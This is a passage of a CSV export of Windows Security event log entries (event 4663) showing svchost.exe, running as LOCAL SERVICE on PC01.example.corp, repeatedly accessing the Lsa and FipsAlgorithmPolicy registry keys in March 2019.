C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452843 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452842 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452841 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452840 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452839 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452838 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452837 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452836 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452835 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452834 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452833 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452832 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452831 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452830 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452829 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452828 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452827 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452826 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452825 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452824 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452823 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452822 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452821 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452820 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452819 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452818 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452817 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452816 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452815 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452814 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452813 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452922 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452921 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452920 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452919 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452918 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452917 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452916 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452915 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452914 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452913 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452912 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452911 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452910 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452909 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452908 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452907 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL 